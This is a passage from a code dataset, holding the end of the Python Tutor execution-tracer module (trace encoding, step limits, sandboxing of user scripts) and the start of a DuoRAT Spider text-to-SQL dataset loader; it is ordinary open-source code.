is_in_parent_frame = True\n\n if is_in_parent_frame and k not in cur_frame.f_code.co_varnames:\n continue\n\n # don't display some built-in locals ...\n if k == '__module__':\n continue\n\n if self.should_hide_var(k):\n continue\n\n encoded_val = self.encoder.encode(v, self.get_parent_of_function)\n encoded_locals[k] = encoded_val\n\n\n # order the variable names in a sensible way:\n\n # Let's start with co_varnames, since it (often) contains all\n # variables in this frame, some of which might not exist yet.\n ordered_varnames = []\n for e in cur_frame.f_code.co_varnames:\n if e in encoded_locals:\n ordered_varnames.append(e)\n\n # sometimes co_varnames doesn't contain all of the true local\n # variables: e.g., when executing a 'class' definition. 
in that\n # case, iterate over encoded_locals and push them onto the end\n # of ordered_varnames in alphabetical order\n for e in sorted(encoded_locals.keys()):\n if e != '__return__' and e not in ordered_varnames:\n ordered_varnames.append(e)\n\n # finally, put __return__ at the very end\n if '__return__' in encoded_locals:\n ordered_varnames.append('__return__')\n\n # doctor Python 3 initializer to look like a normal function (denero)\n if '__locals__' in encoded_locals:\n ordered_varnames.remove('__locals__')\n local = encoded_locals.pop('__locals__')\n if encoded_locals.get('__return__', True) is None:\n encoded_locals['__return__'] = local\n\n # crucial sanity checks!\n assert len(ordered_varnames) == len(encoded_locals)\n for e in ordered_varnames:\n assert e in encoded_locals\n\n return dict(func_name=cur_name,\n is_parent=(cur_frame in self.parent_frames_set),\n frame_id=self.get_frame_id(cur_frame),\n parent_frame_id_list=parent_frame_id_list,\n encoded_locals=encoded_locals,\n ordered_varnames=ordered_varnames)\n\n\n i = self.curindex\n\n # look for whether a nested function has been defined during\n # this particular call:\n if i > 1: # i == 1 implies that there's only a global scope visible\n for v in visit_all_locally_reachable_function_objs(top_frame):\n if (v not in self.closures and \\\n v not in self.globally_defined_funcs):\n\n # Look for the presence of the code object (v.func_code\n # for Python 2 or v.__code__ for Python 3) in the\n # constant pool (f_code.co_consts) of an enclosing\n # stack frame, and set that frame as your parent.\n #\n # This technique properly handles lambdas passed as\n # function parameters. e.g., this example:\n #\n # def foo(x):\n # bar(lambda y: x + y)\n # def bar(a):\n # print a(20)\n # foo(10)\n chosen_parent_frame = None\n # SUPER hacky but seems to work -- use reversed(self.stack)\n # because we want to traverse starting from the TOP of the stack\n # (most recent frame) and find the first frame containing\n # a constant code object that matches v.__code__ or v.func_code\n #\n # required for this example from Berkeley CS61a:\n #\n # def f(p, k):\n # def g():\n # print(k)\n # if k == 0:\n # f(g, 1)\n # f(None, 0)\n #\n # there are two calls to f, each of which defines a\n # closure g that should point to the respective frame.\n #\n # note that for the second call to f, the parent of the\n # g defined in there should be that frame, which is at\n # the TOP of the stack. this reversed() hack does the\n # right thing. 
note that if you don't traverse the stack\n # backwards, then you will mistakenly get the parent as\n # the FIRST f frame (bottom of the stack).\n for (my_frame, my_lineno) in reversed(self.stack):\n if chosen_parent_frame:\n break\n\n for frame_const in my_frame.f_code.co_consts:\n if frame_const is (v.__code__ if is_python3 else v.func_code):\n chosen_parent_frame = my_frame\n break\n\n # 2013-12-01 commented out this line so tests/backend-tests/papajohn-monster.txt\n # works without an assertion failure ...\n #assert chosen_parent_frame # I hope this always passes :0\n\n # this condition should be False for functions declared in global scope ...\n if chosen_parent_frame in self.frame_ordered_ids:\n self.closures[v] = chosen_parent_frame\n self.parent_frames_set.add(chosen_parent_frame) # unequivocally add to this set!!!\n if not chosen_parent_frame in self.zombie_frames:\n self.zombie_frames.append(chosen_parent_frame)\n else:\n # look for code objects of lambdas defined within this\n # function, which comes up in cases like line 2 of:\n # def x(y):\n # (lambda z: lambda w: z+y)(y)\n #\n # x(42)\n if top_frame.f_code.co_consts:\n for e in top_frame.f_code.co_consts:\n if type(e) == types.CodeType and e.co_name == '':\n # TODO: what if it's already in lambda_closures?\n self.lambda_closures[e] = top_frame\n self.parent_frames_set.add(top_frame) # copy-paste from above\n if not top_frame in self.zombie_frames:\n self.zombie_frames.append(top_frame)\n else:\n # if there is only a global scope visible ...\n for (k, v) in get_user_globals(top_frame).items():\n if (type(v) in (types.FunctionType, types.MethodType) and \\\n v not in self.closures):\n self.globally_defined_funcs.add(v)\n\n\n # climb up until you find '', which is (hopefully) the global scope\n top_frame = None\n while True:\n cur_frame = self.stack[i][0]\n cur_name = cur_frame.f_code.co_name\n if cur_name == '':\n break\n\n # do this check because in some cases, certain frames on the\n # stack might NOT be tracked, so don't push a stack entry for\n # those frames. this happens when you have a callback function\n # in an imported module. e.g., your code:\n # def foo():\n # bar(baz)\n #\n # def baz(): pass\n #\n # imported module code:\n # def bar(callback_func):\n # callback_func()\n #\n # when baz is executing, the real stack is [foo, bar, baz] but\n # bar is in imported module code, so pg_logger doesn't trace\n # it, and it doesn't show up in frame_ordered_ids. 
thus, the\n # stack to render should only be [foo, baz].\n if cur_frame in self.frame_ordered_ids:\n encoded_stack_locals.append(create_encoded_stack_entry(cur_frame))\n if not top_frame:\n top_frame = cur_frame\n i -= 1\n\n zombie_encoded_stack_locals = [create_encoded_stack_entry(e) for e in zombie_frames_to_render]\n\n\n # encode in a JSON-friendly format now, in order to prevent ill\n # effects of aliasing later down the line ...\n encoded_globals = {}\n cur_globals_dict = get_user_globals(tos[0], at_global_scope=(self.curindex <= 1))\n for (k, v) in cur_globals_dict.items():\n if self.should_hide_var(k):\n continue\n\n encoded_val = self.encoder.encode(v, self.get_parent_of_function)\n encoded_globals[k] = encoded_val\n\n if k not in self.all_globals_in_order:\n self.all_globals_in_order.append(k)\n\n # filter out globals that don't exist at this execution point\n # (because they've been, say, deleted with 'del')\n ordered_globals = [e for e in self.all_globals_in_order if e in encoded_globals]\n assert len(ordered_globals) == len(encoded_globals)\n\n\n # merge zombie_encoded_stack_locals and encoded_stack_locals\n # into one master ordered list using some simple rules for\n # making it look aesthetically pretty\n stack_to_render = [];\n\n # first push all regular stack entries\n if encoded_stack_locals:\n for e in encoded_stack_locals:\n e['is_zombie'] = False\n e['is_highlighted'] = False\n stack_to_render.append(e)\n\n # highlight the top-most active stack entry\n stack_to_render[0]['is_highlighted'] = True\n\n\n # now push all zombie stack entries\n for e in zombie_encoded_stack_locals:\n # don't display return value for zombie frames\n # TODO: reconsider ...\n '''\n try:\n e['ordered_varnames'].remove('__return__')\n except ValueError:\n pass\n '''\n\n e['is_zombie'] = True\n e['is_highlighted'] = False # never highlight zombie entries\n\n stack_to_render.append(e)\n\n # now sort by frame_id since that sorts frames in \"chronological\n # order\" based on the order they were invoked\n stack_to_render.sort(key=lambda e: e['frame_id'])\n\n\n\n # create a unique hash for this stack entry, so that the\n # frontend can uniquely identify it when doing incremental\n # rendering. the strategy is to use a frankenstein-like mix of the\n # relevant fields to properly disambiguate closures and recursive\n # calls to the same function\n for e in stack_to_render:\n hash_str = e['func_name']\n # frame_id is UNIQUE, so it can disambiguate recursive calls\n hash_str += '_f' + str(e['frame_id'])\n\n # needed to refresh GUI display ...\n if e['is_parent']:\n hash_str += '_p'\n\n # TODO: this is no longer needed, right? 
(since frame_id is unique)\n #if e['parent_frame_id_list']:\n # hash_str += '_p' + '_'.join([str(i) for i in e['parent_frame_id_list']])\n if e['is_zombie']:\n hash_str += '_z'\n\n e['unique_hash'] = hash_str\n\n\n # handle probe_exprs *before* encoding the heap with self.encoder.get_heap\n encoded_probe_vals = {}\n if self.probe_exprs:\n if top_frame: # are we in a function call?\n top_frame_locals = get_user_locals(top_frame)\n else:\n top_frame_locals = {}\n for e in self.probe_exprs:\n try:\n # evaluate it with globals + locals of the top frame ...\n probe_val = eval(e, cur_globals_dict, top_frame_locals)\n encoded_probe_vals[e] = self.encoder.encode(probe_val, self.get_parent_of_function)\n except:\n pass # don't encode the value if there's been an error\n\n if self.show_only_outputs:\n trace_entry = dict(line=lineno,\n event=event_type,\n func_name=tos[0].f_code.co_name,\n globals={},\n ordered_globals=[],\n stack_to_render=[],\n heap={},\n stdout=self.get_user_stdout())\n else:\n trace_entry = dict(line=lineno,\n event=event_type,\n func_name=tos[0].f_code.co_name,\n globals=encoded_globals,\n ordered_globals=ordered_globals,\n stack_to_render=stack_to_render,\n heap=self.encoder.get_heap(),\n stdout=self.get_user_stdout())\n if encoded_probe_vals:\n trace_entry['probe_exprs'] = encoded_probe_vals\n\n # optional column numbers for greater precision\n # (only relevant in Py2crazy, a hacked CPython that supports column numbers)\n if self.crazy_mode:\n # at the very least, grab the column number\n trace_entry['column'] = frame.f_colno\n\n # now try to find start_col and extent\n # (-1 is an invalid instruction index)\n if frame.f_lasti >= 0:\n key = (frame.f_code.co_code, frame.f_lineno, frame.f_colno,frame.f_lasti)\n if key in self.bytecode_map:\n v = self.bytecode_map[key]\n trace_entry['expr_start_col'] = v.start_col\n trace_entry['expr_width'] = v.extent\n trace_entry['opcode'] = v.opcode\n\n # set a 'custom_module_name' field if we're executing in a module\n # that's not the __main__ script:\n if topframe_module != \"__main__\":\n trace_entry['custom_module_name'] = topframe_module\n\n # if there's an exception, then record its info:\n if event_type == 'exception':\n # always check in f_locals\n exc = frame.f_locals['__exception__']\n trace_entry['exception_msg'] = exc[0].__name__ + ': ' + str(exc[1])\n\n\n # append to the trace only the breakpoint line and the next\n # executed line, so that if you set only ONE breakpoint, OPT shows\n # the state before and after that line gets executed.\n append_to_trace = True\n if self.breakpoints:\n if not ((lineno in self.breakpoints) or (self.prev_lineno in self.breakpoints)):\n append_to_trace = False\n\n # TRICKY -- however, if there's an exception, then ALWAYS\n # append it to the trace, so that the error can be displayed\n if event_type == 'exception':\n append_to_trace = True\n\n self.prev_lineno = lineno\n\n if append_to_trace:\n self.trace.append(trace_entry)\n\n\n # sanity check to make sure the state of the world at a 'call' instruction\n # is identical to that at the instruction immediately following it ...\n '''\n if len(self.trace) > 1:\n cur = self.trace[-1]\n prev = self.trace[-2]\n if prev['event'] == 'call':\n assert cur['globals'] == prev['globals']\n for (s1, s2) in zip(cur['stack_to_render'], prev['stack_to_render']):\n assert s1 == s2\n assert cur['heap'] == prev['heap']\n assert cur['stdout'] == prev['stdout']\n '''\n\n\n if len(self.trace) >= MAX_EXECUTED_LINES:\n 
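# step-limit guard: append one final sentinel entry, then force_terminate()\n      # raises bdb.BdbQuit to abort the user's program; finalize() asserts\n      # len(self.trace) <= MAX_EXECUTED_LINES + 1, so only this sentinel entry\n      # may exceed the cap\n      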
self.trace.append(dict(event='instruction_limit_reached', exception_msg='Stopped after running ' + str(MAX_EXECUTED_LINES) + ' steps. Please shorten your code,\\nsince Python Tutor is not designed to handle long-running code.'))\n self.force_terminate()\n\n self.forget()\n\n\n def _runscript(self, script_str):\n self.executed_script = script_str\n self.executed_script_lines = self.executed_script.splitlines()\n\n for (i, line) in enumerate(self.executed_script_lines):\n line_no = i + 1\n # subtle -- if the stripped line starts with '#break', that\n # means it may be a commented-out version of a normal Python\n # 'break' statement, which shouldn't be confused with an\n # OPT user-defined breakpoint!\n #\n # TODO: this still fails when someone writes something like\n # '##break' since it doesn't start with '#break'!!! i just\n # picked an unfortunate name that's also a python keyword :0\n if line.endswith(BREAKPOINT_STR) and not line.strip().startswith(BREAKPOINT_STR):\n self.breakpoints.append(line_no)\n\n if line.startswith(PYTUTOR_HIDE_STR):\n hide_vars = line[len(PYTUTOR_HIDE_STR):]\n # remember to call strip() -> compileGlobMatch()\n hide_vars = [compileGlobMatch(e.strip()) for e in hide_vars.split(',')]\n self.vars_to_hide.update(hide_vars)\n\n if line.startswith(PYTUTOR_INLINE_TYPE_STR):\n listed_types = line[len(PYTUTOR_INLINE_TYPE_STR):]\n # remember to call strip() -> compileGlobMatch()\n listed_types = [compileGlobMatch(e.strip()) for e in listed_types.split(',')]\n self.types_to_inline.update(listed_types)\n\n\n # populate an extent map to get more accurate ranges from code\n if self.crazy_mode:\n # in Py2crazy standard library as Python-2.7.5/Lib/super_dis.py\n import super_dis\n try:\n self.bytecode_map = super_dis.get_bytecode_map(self.executed_script)\n except:\n # failure oblivious\n self.bytecode_map = {}\n\n\n # When bdb sets tracing, a number of call and line events happens\n # BEFORE debugger even reaches user's code (and the exact sequence of\n # events depends on python version). So we take special measures to\n # avoid stopping before we reach the main script (see user_line and\n # user_call for details).\n self._wait_for_mainpyfile = 1\n\n\n # ok, let's try to sorta 'sandbox' the user script by not\n # allowing certain potentially dangerous operations.\n user_builtins = {}\n\n # ugh, I can't figure out why in Python 2, __builtins__ seems to\n # be a dict, but in Python 3, __builtins__ seems to be a module,\n # so just handle both cases ... 
UGLY!\n if type(__builtins__) is dict:\n builtin_items = __builtins__.items()\n else:\n assert type(__builtins__) is types.ModuleType\n builtin_items = []\n for k in dir(__builtins__):\n builtin_items.append((k, getattr(__builtins__, k)))\n\n for (k, v) in builtin_items:\n if k == 'open' and not self.allow_all_modules: # put this before BANNED_BUILTINS\n user_builtins[k] = open_wrapper\n elif k in BANNED_BUILTINS:\n user_builtins[k] = create_banned_builtins_wrapper(k)\n elif k == '__import__' and not self.allow_all_modules:\n user_builtins[k] = __restricted_import__\n else:\n if k == 'raw_input':\n user_builtins[k] = raw_input_wrapper\n elif k == 'input':\n if is_python3:\n # Python 3 input() is Python 2 raw_input()\n user_builtins[k] = raw_input_wrapper\n else:\n user_builtins[k] = python2_input_wrapper\n else:\n user_builtins[k] = v\n\n user_builtins['mouse_input'] = mouse_input_wrapper\n\n if self.separate_stdout_by_module:\n self.stdout_by_module[\"__main__\"] = StringIO.StringIO()\n if self.custom_modules:\n for module_name in self.custom_modules:\n self.stdout_by_module[module_name] = StringIO.StringIO()\n self.stdout_by_module[\"\"] = StringIO.StringIO() # catch-all for all other modules we're NOT tracing\n sys.stdout = self.stdout_by_module[\"\"] # start with \n else:\n # default -- a single unified stdout stream\n self.user_stdout = StringIO.StringIO()\n sys.stdout = self.user_stdout\n\n self.ORIGINAL_STDERR = sys.stderr\n\n # don't do this, or else certain kinds of errors, such as syntax\n # errors, will be silently ignored. WEIRD!\n #sys.stderr = NullDevice # silence errors\n\n user_globals = {}\n\n # if there are custom_modules, 'import' them into user_globals,\n # which emulates \"from import *\"\n if self.custom_modules:\n for mn in self.custom_modules:\n # http://code.activestate.com/recipes/82234-importing-a-dynamically-generated-module/\n new_m = imp.new_module(mn)\n exec(self.custom_modules[mn], new_m.__dict__) # exec in custom globals\n user_globals.update(new_m.__dict__)\n\n # important: do this LAST to get precedence over values in custom_modules\n user_globals.update({\"__name__\" : \"__main__\",\n \"__builtins__\" : user_builtins})\n\n try:\n # if allow_all_modules is on, then try to parse script_str into an\n # AST, traverse the tree to find all modules that it imports, and then\n # try to PRE-IMPORT all of those. if we *don't* pre-import a module,\n # then when it's imported in the user's code, it may take *forever*\n # because the bdb debugger tries to single-step thru that code\n # (i think!). 
run 'import pandas' to quickly test this.\n    if self.allow_all_modules:\n      import ast\n      try:\n        all_modules_to_preimport = []\n        tree = ast.parse(script_str)\n        for node in ast.walk(tree):\n          if isinstance(node, ast.Import):\n            for n in node.names:\n              all_modules_to_preimport.append(n.name)\n          elif isinstance(node, ast.ImportFrom):\n            all_modules_to_preimport.append(node.module)\n\n        for m in all_modules_to_preimport:\n          if m in script_str: # optimization: load only modules that appear in script_str\n            try:\n              __import__(m)\n            except ImportError:\n              pass\n      except:\n        pass\n\n\n      # enforce resource limits RIGHT BEFORE running script_str\n\n      # set ~200MB virtual memory limit AND a 5-second CPU time\n      # limit (tuned for Webfaction shared hosting) to protect against\n      # memory bombs such as:\n      #   x = 2\n      #   while True: x = x*x\n      if resource_module_loaded and (not self.disable_security_checks):\n        assert not self.allow_all_modules # <-- shouldn't be on!\n\n        # PREEMPTIVELY import all of these modules, so that when the user's\n        # script imports them, it won't try to do a file read (since they've\n        # already been imported and cached in memory). Remember that when\n        # the user's code runs, resource.setrlimit(resource.RLIMIT_NOFILE, (0, 0))\n        # will already be in effect, so no more files can be opened.\n        for m in ALLOWED_STDLIB_MODULE_IMPORTS:\n          if m in script_str: # optimization: load only modules that appear in script_str\n            try:\n              __import__(m)\n            except ImportError:\n              pass\n\n        resource.setrlimit(resource.RLIMIT_AS, (200000000, 200000000))\n        resource.setrlimit(resource.RLIMIT_CPU, (5, 5))\n\n        # protect against unauthorized filesystem accesses ...\n        resource.setrlimit(resource.RLIMIT_NOFILE, (0, 0)) # no opened files allowed\n\n        # VERY WEIRD. If you activate this resource limitation, it\n        # ends up generating an EMPTY trace for the following program:\n        #   \"x = 0\\nfor i in range(10):\\n    x += 1\\n    print x\\n    x += 1\\n\"\n        # (at least on my Webfaction hosting with Python 2.7)\n        #resource.setrlimit(resource.RLIMIT_FSIZE, (0, 0)) # (redundancy for paranoia)\n\n        # The posix module is a built-in and has a ton of OS access\n        # facilities ... if you delete those functions from\n        # sys.modules['posix'], it seems like they're gone EVEN IF\n        # someone else imports posix in a roundabout way. Of course,\n        # I don't know how foolproof this scheme is, though.\n        # (It's not sufficient to just \"del sys.modules['posix']\";\n        # it can just be reimported without accessing an external\n        # file and tripping RLIMIT_NOFILE, since the posix module\n        # is baked into the python executable, ergh. Actually DON'T\n        # \"del sys.modules['posix']\", since re-importing it will\n        # refresh all of the attributes. 
ergh^2)\n for a in dir(sys.modules['posix']):\n delattr(sys.modules['posix'], a)\n # do the same with os\n for a in dir(sys.modules['os']):\n # 'path' is needed for __restricted_import__ to work\n # and 'stat' is needed for some errors to be reported properly\n if a not in ('path', 'stat'):\n delattr(sys.modules['os'], a)\n # ppl can dig up trashed objects with gc.get_objects()\n import gc\n for a in dir(sys.modules['gc']):\n delattr(sys.modules['gc'], a)\n del sys.modules['gc']\n\n # sys.modules contains an in-memory cache of already-loaded\n # modules, so if you delete modules from here, they will\n # need to be re-loaded from the filesystem.\n #\n # Thus, as an extra precaution, remove these modules so that\n # they can't be re-imported without opening a new file,\n # which is disallowed by resource.RLIMIT_NOFILE\n #\n # Of course, this isn't a foolproof solution by any means,\n # and it might lead to UNEXPECTED FAILURES later in execution.\n del sys.modules['os']\n del sys.modules['os.path']\n del sys.modules['sys']\n\n self.run(script_str, user_globals, user_globals)\n # sys.exit ...\n except SystemExit:\n #sys.exit(0)\n raise bdb.BdbQuit\n except:\n if DEBUG:\n traceback.print_exc()\n\n trace_entry = dict(event='uncaught_exception')\n\n (exc_type, exc_val, exc_tb) = sys.exc_info()\n if hasattr(exc_val, 'lineno'):\n trace_entry['line'] = exc_val.lineno\n if hasattr(exc_val, 'offset'):\n trace_entry['offset'] = exc_val.offset\n\n trace_entry['exception_msg'] = type(exc_val).__name__ + \": \" + str(exc_val)\n\n # SUPER SUBTLE! if ANY exception has already been recorded by\n # the program, then DON'T record it again as an uncaught_exception.\n # This looks kinda weird since the exact exception message doesn't\n # need to match up, but in practice, there should be at most only\n # ONE exception per trace.\n already_caught = False\n for e in self.trace:\n if e['event'] == 'exception':\n already_caught = True\n break\n\n if not already_caught:\n if not self.done:\n self.trace.append(trace_entry)\n\n raise bdb.BdbQuit # need to forceably STOP execution\n\n\n def force_terminate(self):\n #self.finalize()\n raise bdb.BdbQuit # need to forceably STOP execution\n\n\n def finalize(self):\n sys.stdout = self.GAE_STDOUT # very important!\n sys.stderr = self.ORIGINAL_STDERR\n\n assert len(self.trace) <= (MAX_EXECUTED_LINES + 1)\n\n # don't do this anymore ...\n '''\n # filter all entries after 'return' from '', since they\n # seem extraneous:\n res = []\n for e in self.trace:\n res.append(e)\n if e['event'] == 'return' and e['func_name'] == '':\n break\n '''\n\n res = self.trace\n\n # if the SECOND to last entry is an 'exception'\n # and the last entry is return from , then axe the last\n # entry, for aesthetic reasons :)\n if len(res) >= 2 and \\\n res[-2]['event'] == 'exception' and \\\n res[-1]['event'] == 'return' and res[-1]['func_name'] == '':\n res.pop()\n\n self.trace = res\n\n if self.custom_modules:\n # when there's custom_modules, call with a dict as the first parameter\n return self.finalizer_func(dict(main_code=self.executed_script,\n custom_modules=self.custom_modules),\n self.trace)\n else:\n # common case\n return self.finalizer_func(self.executed_script, self.trace)\n\n\nimport json\n\n# the MAIN meaty function!!!\ndef exec_script_str(script_str, raw_input_lst_json, options_json, finalizer_func):\n if options_json:\n options = json.loads(options_json)\n else:\n # defaults\n options = {'cumulative_mode': False,\n 'heap_primitives': False, 'show_only_outputs': False}\n\n py_crazy_mode 
= ('py_crazy_mode' in options and options['py_crazy_mode'])\n\n  logger = PGLogger(options['cumulative_mode'], options['heap_primitives'], options['show_only_outputs'], finalizer_func,\n                    crazy_mode=py_crazy_mode)\n\n  # TODO: refactor these NOT to be globals\n  global input_string_queue\n  input_string_queue = []\n  if raw_input_lst_json:\n    # TODO: if we want to support unicode, remove str() cast\n    input_string_queue = [str(e) for e in json.loads(raw_input_lst_json)]\n\n  try:\n    logger._runscript(script_str)\n  except bdb.BdbQuit:\n    pass\n  finally:\n    logger.finalize()\n\n\n# disables security check and returns the result of finalizer_func\n# WARNING: ONLY RUN THIS LOCALLY and never over the web, since\n# security checks are disabled\n#\n# [optional] probe_exprs is a list of strings representing\n# expressions whose values to probe at each step (advanced)\ndef exec_script_str_local(script_str, raw_input_lst_json, cumulative_mode, heap_primitives, finalizer_func,\n                          probe_exprs=None, allow_all_modules=False):\n  logger = PGLogger(cumulative_mode, heap_primitives, False, finalizer_func,\n                    disable_security_checks=True,\n                    allow_all_modules=allow_all_modules,\n                    probe_exprs=probe_exprs)\n\n  # TODO: refactor these NOT to be globals\n  global input_string_queue\n  input_string_queue = []\n  if raw_input_lst_json:\n    # TODO: if we want to support unicode, remove str() cast\n    input_string_queue = [str(e) for e in json.loads(raw_input_lst_json)]\n\n  try:\n    logger._runscript(script_str)\n  except bdb.BdbQuit:\n    pass\n  finally:\n    return logger.finalize()\n","repo_name":"fbeilstein/machine_learning","sub_path":"pytutor/pg_logger.py","file_name":"pg_logger.py","file_ext":"py","file_size_in_byte":66106,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"61"} +{"seq_id":"18168420301","text":"import os\nimport dataclasses\nimport json\nfrom typing import Optional, Tuple, List, Iterable\n\nimport attr\nimport networkx as nx\nfrom networkx.drawing.layout import shell_layout\nfrom pydantic.dataclasses import dataclass\nfrom pydantic.main import BaseConfig\nfrom torch.utils.data import Dataset\n\nfrom duorat.utils import registry\nfrom third_party.spider import evaluation\nfrom third_party.spider.preprocess.schema import get_schemas_from_json, Schema\nfrom third_party.spider.process_sql import get_sql\n\n\n@dataclass\nclass SpiderTable:\n    \"\"\"A database table\"\"\"\n    id: int  # table id\n    name: List[str]  # table name tokens (list)\n    unsplit_name: str  # TODO (YuweiYin): explain the meaning/purpose of this attribute\n    orig_name: str  # TODO (YuweiYin): explain the meaning/purpose of this attribute\n    orig_name_for_unparse: str  # used to emit the original table name when unparsing\n    columns: List[\"SpiderColumn\"] = dataclasses.field(default_factory=list)  # columns contained in this table (list)\n    primary_keys: List[str] = dataclasses.field(default_factory=list)  # primary keys of this table (list)\n\n\n@dataclass\nclass SpiderColumn:\n    \"\"\"A database column\"\"\"\n    id: int  # column id\n    table: Optional[SpiderTable]  # the table this column belongs to\n    name: List[str]  # column name tokens (list)\n    unsplit_name: str  # TODO (YuweiYin): explain the meaning/purpose of this attribute\n    orig_name: str  # TODO (YuweiYin): explain the meaning/purpose of this attribute\n    orig_name_for_unparse: str  # used to emit the original column name when unparsing\n    type: str  # column type name\n    foreign_key_for: Optional[str] = None  # foreign key name\n\n\nSpiderTable.__pydantic_model__.update_forward_refs()\n\n\nclass SpiderSchemaConfig:\n    arbitrary_types_allowed = True\n\n\n@dataclass(config=SpiderSchemaConfig)\nclass SpiderSchema(BaseConfig):\n    \"\"\"A database schema\"\"\"\n    db_id: str  # database id\n    tables: Tuple[SpiderTable, ...]  # tables contained in this database (list)\n    columns: Tuple[SpiderColumn, ...]  # columns contained in this database (list)\n
# columns contained in this database (list)\n foreign_key_graph: nx.DiGraph # directed graph built from the foreign-key relations\n orig: dict # TODO (YuweiYin) explain the meaning/purpose of this attribute\n\n\n@dataclass\nclass SpiderItem:\n \"\"\"A data item. slml: Schema Linking Markup Language\"\"\"\n question: str # natural-language question\n slml_question: Optional[str] # TODO (YuweiYin) explain the meaning/purpose of this attribute (likely the AST-related structure obtained by parsing the question)\n query: str # SQL statement (ground-truth label)\n spider_sql: dict # the sql structure given in the dataset\n spider_schema: SpiderSchema # the database this item belongs to\n db_path: str # path to the original file of the database this item belongs to\n orig: dict # TODO (YuweiYin) explain the meaning/purpose of this attribute\n\ndef schema_dict_to_spider_schema(schema_dict):\n # Build a SpiderTable object for each table, collected into a tuple\n tables = tuple(\n SpiderTable(id=i, name=name.split(), unsplit_name=name, orig_name=orig_name, orig_name_for_unparse=orig_name_for_unparse)\n for i, (name, orig_name, orig_name_for_unparse) in enumerate(\n zip(schema_dict[\"table_names\"], schema_dict[\"table_names_original\"], schema_dict[\"original_table_names\"])\n )\n )\n # Build a SpiderColumn object for each column, collected into a tuple\n columns = tuple(\n SpiderColumn(\n id=i,\n table=tables[table_id] if table_id >= 0 else None,\n name=col_name.split(),\n unsplit_name=col_name,\n orig_name=orig_col_name,\n orig_name_for_unparse=orig_col_name_for_unparse,\n type=col_type,\n )\n for i, ((table_id, col_name), (_, orig_col_name), col_type, (_, orig_col_name_for_unparse)) in enumerate(\n zip(\n schema_dict[\"column_names\"],\n schema_dict[\"column_names_original\"],\n schema_dict[\"column_types\"],\n schema_dict[\"original_column_names\"]\n )\n )\n )\n\n # Link columns to tables: point each column back to the table it belongs to\n for column in columns:\n if column.table:\n column.table.columns.append(column)\n\n # Register the primary-key columns\n for column_id in schema_dict[\"primary_keys\"]:\n # Register primary keys\n column = columns[column_id]\n column.table.primary_keys.append(column)\n\n # Build the foreign-key graph; each foreign-key relation adds directed edges both ways between the source and destination tables\n foreign_key_graph = nx.DiGraph()\n for source_column_id, dest_column_id in schema_dict[\"foreign_keys\"]:\n # Register foreign keys\n source_column = columns[source_column_id]\n dest_column = columns[dest_column_id]\n source_column.foreign_key_for = dest_column\n\n # Add links in both directions\n foreign_key_graph.add_edge(\n source_column.table.id,\n dest_column.table.id,\n columns=(source_column_id, dest_column_id),\n )\n foreign_key_graph.add_edge(\n dest_column.table.id,\n source_column.table.id,\n columns=(dest_column_id, source_column_id),\n )\n\n # Build and return the SpiderSchema object for the database\n db_id = schema_dict[\"db_id\"]\n return SpiderSchema(db_id, tables, columns, foreign_key_graph, schema_dict)\n\n\ndef load_tables(paths):\n \"\"\"\n :param paths: list, where each entry is the path for one database's schema file\n :return: all database schemas and the foreign-key map dict\n \"\"\"\n schemas = {}\n eval_foreign_key_maps = {}\n\n for path in paths:\n schema_dicts = json.load(open(path))\n for schema_dict in schema_dicts:\n db_id = schema_dict[\"db_id\"]\n assert db_id not in schemas\n \n schemas[db_id] = schema_dict\n eval_foreign_key_maps[db_id] = evaluation.build_foreign_key_map(schema_dict)\n\n return schemas, eval_foreign_key_maps\n\n\ndef load_original_schemas(tables_paths):\n # Load the original database schemas from the json files\n all_schemas = {}\n for path in tables_paths:\n schemas, db_ids, tables = get_schemas_from_json(path)\n for db_id in db_ids:\n all_schemas[db_id] = Schema(schemas[db_id], tables[db_id])\n return all_schemas\n\n\ndef check_now_time(entry, schema):\n \"\"\"\n Check for TIME_NOW in the entry and convert it into a column of the table\n \"\"\"\n if schema['column_names'][-1] != [0, '当前时间']:\n schema['column_names'].append([0, '当前时间'])\n schema['column_types'].append('time')\n schema['column_names_original'].append([0, '当前时间'])\n schema['original_column_names'].append([0, '当前时间'])\n 
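# A hedged illustration (assumed shape, not taken from this repo): each where-condition\n # follows the spider cond_unit format (not_op, op_id, val_unit, val1, val2), where val_unit\n # is (unit_op, col_unit1, col_unit2) and col_unit1 is (agg_id, col_id, is_distinct), so the\n # placeholder sits at where_cond[0][2][1][1], the col_id slot of the first condition, e.g.:\n # entry['sql']['where'] = [(False, 2, (0, (0, 'TIME_NOW', False), None), 1.0, None)]\n 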
#print(entry['sql'])\n if 'where' in entry['sql'].keys():\n where_cond = entry['sql']['where']\n if len(where_cond) > 0:\n temp = where_cond[0][2][1][1]\n if temp == 'TIME_NOW':\n entry['sql']['where'][0][2][1][1] = len(schema['column_names'])-1\n return True\n return False\n\n\n@registry.register(\"dataset\", \"spider\")\nclass SpiderDataset(Dataset):\n def __init__(self, paths: List[str], tables_paths: List[str], db_path: str):\n self.paths = paths\n self.db_path = db_path\n self.examples = [] # all data item objects (list)\n\n # Load all database schemas and the foreign-key map dict\n self.schemas, self.eval_foreign_key_maps = load_tables(tables_paths)\n\n raw_datas = []\n # Handle the time_now column\n for path in paths:\n # Read in the data\n raw_data = json.load(open(path))\n for i, entry in enumerate(raw_data):\n # Check for the TIME_NOW placeholder in the entry and convert it into a column of the table\n check_now_time(entry, self.schemas[entry['db_id']])\n \n # Rewriting the data file would cause bugs, so just keep the modified data in an array\n raw_datas.append(raw_data)\n\n # Build each database object (and its internal table and column objects)\n for db_id, schema_dict in self.schemas.items():\n self.schemas[db_id] = schema_dict_to_spider_schema(schema_dict)\n\n # Load the original database schemas from the json files\n original_schemas = load_original_schemas(tables_paths)\n\n # Iterate over the raw data\n for raw_data in raw_datas: \n for entry in raw_data:\n # Get the sql entry of the raw data; it is used to build the AST (abstract syntax tree)\n if \"sql\" not in entry:\n entry[\"sql\"] = get_sql(\n original_schemas[entry[\"db_id\"]], entry[\"query\"]\n )\n # Build the data item object\n item = SpiderItem(\n question=entry[\"question\"],\n slml_question=entry.get(\"slml_question\", None),\n query=entry[\"original_sql_query\"] if 'original_sql_query' in entry.keys() else entry[\"query\"],\n spider_sql=entry[\"sql\"],\n spider_schema=self.schemas[entry[\"db_id\"]],\n db_path=self.get_db_path(entry[\"db_id\"]),\n orig=entry,\n )\n # Add this item to self.examples, the list of all data item objects\n self.examples.append(item)\n\n def get_db_path(self, db_id: str):\n return os.path.join(self.db_path, db_id, 'contents.json')\n\n def __len__(self) -> int:\n return 